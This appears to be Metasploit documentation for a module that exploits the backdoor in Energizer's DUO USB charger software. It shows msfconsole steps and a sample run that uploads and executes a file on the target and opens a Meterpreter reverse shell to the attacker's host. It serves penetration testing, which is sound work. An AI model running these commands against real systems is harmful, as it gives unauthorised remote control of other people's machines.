## Vulnerable Application More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan). Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777. The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx). ## Verification Steps 1. Install the vulnerable software 2. Start msfconsole 3. Do: `use exploit/windows/backdoor/energizer_duo_payload` 4. Do: `set rhost` 5. Do: `set payload` 6. Do: `exploit` ## Scenarios A run against the backdoor ``` msf > use exploit/windows/backdoor/energizer_duo_payload msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132 msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228 msf exploit(energizer_duo_payload) > exploit [*] Started reverse handler on 192.168.0.228:4444 [*] Trying to upload C:\NTL0ZTL4DhVL.exe... [*] Trying to execute C:\NTL0ZTL4DhVL.exe... [*] Sending stage (747008 bytes) [*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200) meterpreter > getuid Server username: XPDEV\Developer ```